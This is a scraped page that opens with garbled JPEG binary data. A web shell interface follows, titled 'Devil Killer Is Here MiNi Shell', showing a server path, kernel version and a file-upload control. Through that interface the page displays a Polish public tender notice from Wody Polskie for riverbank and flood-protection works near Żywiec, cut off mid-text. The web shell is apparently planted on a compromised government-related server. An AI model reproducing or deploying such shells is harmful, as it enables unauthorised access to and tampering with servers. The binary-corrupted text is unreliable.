JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230531/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230531/0024187001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Roboty budowlane na terenie Nadzoru Wodnego w Żywcu etap V </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Wodne Wody Polskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 368302575</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żelazna 59a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-848</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">krakow@wody.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wody.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Roboty budowlane na terenie Nadzoru Wodnego w Żywcu etap V </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b7f91108-ffb5-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00241870</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00118919/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.35 Roboty budowlane na terenie Nadzoru Wodnego w Żywcu - etap V</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przetargi.wody.gov.pl/wp/auctions/r16541,Roboty-budowlane-na-terenie-Nadzoru-Wodnego-w-Zywcu-etap-V.html?sid=ec5018bf527afc921a4bd0df1c6ff7dc <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Zgodnie z art. 61 ust. 1 ustawy Pzp – komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się w formie elektronicznej, za pośrednictwem Platformy Zakupowej – zwanej dalej „Platformą” – pod<br/>adresem: https://przetargi.wody.gov.pl/. Platforma wypełnia definicję strony internetowej postępowania, na której publikowana jest<br/>dokumentacja postępowania. Wskazany w zdaniu 1 adres strony internetowej postępowania, to adres pod którym udostępniane<br/>będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie<br/>zamówienia.<br/>2. Korzystanie z Platformy jest nieodpłatne. Instrukcja korzystania z Platformy znajduje się pod adresem przetargi.wody.gov.pl w<br/>zakładce: Instrukcja dla Wykonawców. Regulamin dostępny jest w zakładce „Regulamin”. Korzystanie z Platformy oznacza<br/>akceptację regulaminu oraz Instrukcji.<br/>3. Korzystanie z Platformy nie wymaga zarejestrowania konta na Platformie</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Celem skomunikowania się z<br/>Zamawiającym (z wyłączeniem złożenia oferty oraz dokumentów lub oświadczeń składanych razem z ofertą, których sposób<br/>złożenia został opisany w pkt 14.1 – 14.6 specyfikacji warunków zamówienia, zwanej dalej „SWZ”), Wykonawca korzysta z zakładki<br/>„Zapytaj” (na etapie składania ofert) lub „Wiadomości” (po otwarciu ofert). Zakładki te służą również Zamawiającemu do komunikacji<br/>z Wykonawcami.<br/>2. Za datę wpływu wszelkiej korespondencji do Zamawiającego, w tym złożenia oferty oraz dokumentów lub oświadczeń składanych<br/>razem z ofertą, uważa się datę wczytania korespondencji na Platformie.<br/>3. Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2 do Rozporządzenia Rady<br/>Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w<br/>postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych, niemniej jednak Zamawiający rekomenduje<br/>sporządzenie korespondencji w następujących formatach: .doc., .docx, .rtf, .pdf, .xls.<br/>4. Zamawiający informuje, że adres e-mail: Marzena.Pomorska@wody.gov.pl służy jedynie do przesyłania ogłoszeń i otrzymywania<br/>informacji zwrotnej z Biuletynu Zamówień Publicznych oraz zwrotu wadiów wniesionych w formie niepieniężnej. Ewentualne<br/>wykorzystanie poczty elektronicznej w innych celach, niż wskazane w zdaniu 1, może nastąpić jedynie w przypadku awarii<br/>Platformy, przy czym - bez względu na przyczynę - poczta elektroniczna nie może służyć do złożenia oferty.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi 150 MB.<br/>6. Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania dokumentów lub oświadczeń składane są przez Wykonawcę<br/>za pośrednictwem Platformy jako załączniki. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub cyfrowych<br/>odwzorowań dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów<br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz<br/>innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.<br/>7. Osobą uprawnioną do kontaktu z Wykonawcami jest Krzysztof Madej. Kontakt odbywa się za pośrednictwem Platformy.<br/>8. Postępowanie o udzielenie zamówienia jest prowadzone w języku polskim</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>a) administratorem Pani/Pana danych osobowych jest Państwowe Gospodarstwo Wodne Wody Polskie z siedzibą w Warszawie przy<br/>ul. Żelaznej 59A, 00-848 Warszawa, REGON: 368302575, NIP: 527-282-56-16;<br/>b) kontakt z Inspektorem ochrony danych w PGW WP możliwy jest pod adresem e-mail: iod@wody.gov.pl;<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego oznaczonego numerem postępowania KR.ROZ.2810.10.2022 prowadzonym na podstawie<br/>ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych, przez okres 4 lat licząc od końca roku kalendarzowego, w którym zakończono postępowanie o udzielenie zamówienia a<br/>f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy z dnia 11 września 2019 r.<br/>Prawo zamówień publicznych;<br/>g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Państwu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KR.ROZ.2710.48.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie prac utrzymaniowych na potoku Trzebinka, w tym zasyp istniejących wyrw. Prace ręczne oraz mechaniczne, wykopy oraz przekopy wykonywane ładowarkami przedsiębiernymi wraz ze stabilizacją kamieniem ciężkim łamanym. Erozja boczna wód potoku powoduje podmywanie skarp brzegowych, oraz porastającej roślinności drzewiastej powodując zagrożenie dla istniejących zabezpieczeń brzegowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45243000-2 - Roboty w zakresie ochrony przybrzeżnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">15.1	Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/>15.2 Zamawiający dokona oceny ofert niepodlegających odrzuceniu na podstawie następujących kryteriów:<br/>15.2.1 C - Cena – kryterium 80%;<br/>15.2.2	R – Okres rękojmi i gwarancji – kryterium 20%;<br/>15.3 Zamawiający przyzna wartości punktowe w kryterium, o których mowa w pkt. 15.2 z zastosowaniem następujących zasad:<br/><br/>15.3.1 W kryterium „Cena” Zamawiający przyzna wartości punktowe według następującego wzoru:<br/><br/> najniższa cena brutto<br/> C = ---------------------------------------------- x 100 x 0,8<br/> cena brutto badanej oferty <br/><br/><br/>15.3.2 W kryterium „Okres rękojmi i gwarancji – „R” <br/><br/>Ro – R min<br/>R = ------------------------------------ x 100 x 0,2<br/>R max – R min<br/><br/>gdzie:<br/>R - liczba punktów przyznana danej ofercie w kryterium okres rękojmi i gwarancji <br/>R max – maksymalny okres rękojmi i gwarancji - tj. 76 miesięcy<br/>R min – minimalny okres rękojmi i gwarancji - tj. 36 miesięcy<br/>R o – okres rękojmi i gwarancji oferty ocenianej<br/><br/>Jeżeli Wykonawca nie wpisze na Formularzu ofertowym okres rękojmi i gwarancji, Zamawiający uzna, że Wykonawca deklaruje minimalną wymaganą rękojmię i gwarancję przez Zamawiającego. W takim wypadku oferta w tym kryterium otrzyma 0 pkt. Jeżeli Wykonawca wykaże na Formularzu ofertowym rękojmię i gwarancję większą niż maksymalna rękojmia i gwarancja podlegająca punktacji, Zamawiający przyzna ofercie maksymalną liczbę punktów przewidzianą w ramach kryterium, tj. 20 pkt. <br/><br/>UWAGA:<br/>a.	Okres rękojmi i gwarancji należy podać w formularzu ofertowym w miesiącach. Jeżeli Wykonawca poda okres rękojmi i gwarancji w latach, Zamawiający przeliczy go na miesiące zgodnie z zasadą 1 rok = 12 miesięcy.<br/>b.	MINIMALNY wymagany przez Zamawiającego okres rękojmi i gwarancji wynosi 36 miesięcy. W przypadku podania przez Wykonawcę krótszego okresu rękojmi i gwarancji niż wymagany, oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust.1 pkt 5) ustawy Prawo zamówień publicznych, jako niezgodna z treścią SWZ. W przypadku nie podania (nie wpisania) w formularzu ofertowym okresu rękojmi i gwarancji Zamawiający uzna, iż Wykonawca oferuje jedynie wymagany, minimalny okres rękojmi i gwarancji jakości tj. 36 miesięcy. <br/><br/>MAKSYMALNY punktowany okres rękojmi i gwarancji uwzględniony do oceny ofert wynosi 76 miesięcy. Jeżeli Wykonawca zaoferuje okres rękojmi i gwarancji dłuższy niż 76 miesięcy do oceny ofert zostanie przyjęty okres 76 miesięcy. <br/><br/>15.4 Kryteria będą liczone wg wzoru: P = C + R<br/><br/>gdzie:<br/>P – oznacza łączną ilość punktów przyznaną ofercie (maksymalnie 100 pkt),<br/>C – oznacza ilość punktów uzyskanych w ramach kryterium „cena” (maksymalnie 80 pkt)<br/>R – oznacza ilość punktów uzyskanych w ramach kryterium „okres rękojmi i gwarancji” (maksymalnie 20 pkt)<br/>15.5	Punktacja przyznawana ofertom w kryterium ceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. <br/>15.6	Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów. <br/>15.7	W przypadku, gdy dwie lub więcej ofert przedstawi taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w wyznaczonym terminie ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie prac polegających na remoncie istniejącego muru betonowego na prawym i lewym brzegu potoku poprzez oczyszczenie i uzupełnienie ubytków betonem, a także stabilizacja brzegów potoku kamieniem ciężkim łamanym. W ramach zadania oczyszczone zostaną również brzegi potoku Sienka poprzez wycinkę zakrzaczeń i drzew stwarzających zagrożenie. Celem przedmiotowego zadania jest ochrona terenów przyległych, infrastruktury, a także mienia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45243000-2 - Roboty w zakresie ochrony przybrzeżnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">15.1	Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/>15.2 Zamawiający dokona oceny ofert niepodlegających odrzuceniu na podstawie następujących kryteriów:<br/>15.2.1 C - Cena – kryterium 80%;<br/>15.2.2	R – Okres rękojmi i gwarancji – kryterium 20%;<br/>15.3 Zamawiający przyzna wartości punktowe w kryterium, o których mowa w pkt. 15.2 z zastosowaniem następujących zasad:<br/><br/>15.3.1 W kryterium „Cena” Zamawiający przyzna wartości punktowe według następującego wzoru:<br/><br/> najniższa cena brutto<br/> C = ---------------------------------------------- x 100 x 0,8<br/> cena brutto badanej oferty <br/><br/><br/>15.3.2 W kryterium „Okres rękojmi i gwarancji – „R” <br/><br/>Ro – R min<br/>R = ------------------------------------ x 100 x 0,2<br/>R max – R min<br/><br/>gdzie:<br/>R - liczba punktów przyznana danej ofercie w kryterium okres rękojmi i gwarancji <br/>R max – maksymalny okres rękojmi i gwarancji - tj. 76 miesięcy<br/>R min – minimalny okres rękojmi i gwarancji - tj. 36 miesięcy<br/>R o – okres rękojmi i gwarancji oferty ocenianej<br/><br/>Jeżeli Wykonawca nie wpisze na Formularzu ofertowym okres rękojmi i gwarancji, Zamawiający uzna, że Wykonawca deklaruje minimalną wymaganą rękojmię i gwarancję przez Zamawiającego. W takim wypadku oferta w tym kryterium otrzyma 0 pkt. Jeżeli Wykonawca wykaże na Formularzu ofertowym rękojmię i gwarancję większą niż maksymalna rękojmia i gwarancja podlegająca punktacji, Zamawiający przyzna ofercie maksymalną liczbę punktów przewidzianą w ramach kryterium, tj. 20 pkt. <br/><br/>UWAGA:<br/>a.	Okres rękojmi i gwarancji należy podać w formularzu ofertowym w miesiącach. Jeżeli Wykonawca poda okres rękojmi i gwarancji w latach, Zamawiający przeliczy go na miesiące zgodnie z zasadą 1 rok = 12 miesięcy.<br/>b.	MINIMALNY wymagany przez Zamawiającego okres rękojmi i gwarancji wynosi 36 miesięcy. W przypadku podania przez Wykonawcę krótszego okresu rękojmi i gwarancji niż wymagany, oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust.1 pkt 5) ustawy Prawo zamówień publicznych, jako niezgodna z treścią SWZ. W przypadku nie podania (nie wpisania) w formularzu ofertowym okresu rękojmi i gwarancji Zamawiający uzna, iż Wykonawca oferuje jedynie wymagany, minimalny okres rękojmi i gwarancji jakości tj. 36 miesięcy. <br/><br/>MAKSYMALNY punktowany okres rękojmi i gwarancji uwzględniony do oceny ofert wynosi 76 miesięcy. Jeżeli Wykonawca zaoferuje okres rękojmi i gwarancji dłuższy niż 76 miesięcy do oceny ofert zostanie przyjęty okres 76 miesięcy. <br/><br/>15.4 Kryteria będą liczone wg wzoru: P = C + R<br/><br/>gdzie:<br/>P – oznacza łączną ilość punktów przyznaną ofercie (maksymalnie 100 pkt),<br/>C – oznacza ilość punktów uzyskanych w ramach kryterium „cena” (maksymalnie 80 pkt)<br/>R – oznacza ilość punktów uzyskanych w ramach kryterium „okres rękojmi i gwarancji” (maksymalnie 20 pkt)<br/>15.5	Punktacja przyznawana ofertom w kryterium ceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. <br/>15.6	Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów. <br/>15.7	W przypadku, gdy dwie lub więcej ofert przedstawi taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający wezwie Wykonawców, którzy 